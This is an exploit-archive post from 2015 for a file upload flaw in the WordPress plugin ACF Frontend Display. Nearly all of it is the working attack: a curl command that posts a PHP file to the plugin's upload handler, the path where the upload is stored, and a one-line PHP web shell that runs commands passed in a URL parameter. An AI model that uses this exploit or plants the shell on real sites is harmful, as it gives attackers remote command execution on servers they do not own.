Home / exploits WordPress ACF Frontend Display Shell Upload
Posted on 08 July 2015
+---------------------------------------------------------------------------+ #[+] Author: TUNISIAN CYBER #[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability #[+] Date: 3-07-2015 #[+] Type: WebAPP #[+] Tested on: KaliLinux #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R +---------------------------------------------------------------------------+ curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php" File Path: site/wp-content/uploads/uigen_YEAR/file.php Example: site/wp-content/uploads/uigen_2015/evil.php evil.php: <?php passthru($_GET['cmd']); ?> POC: http://i.imgur.com/7rQClr6.png TUNISIAN CYBER(miutex)-S4E
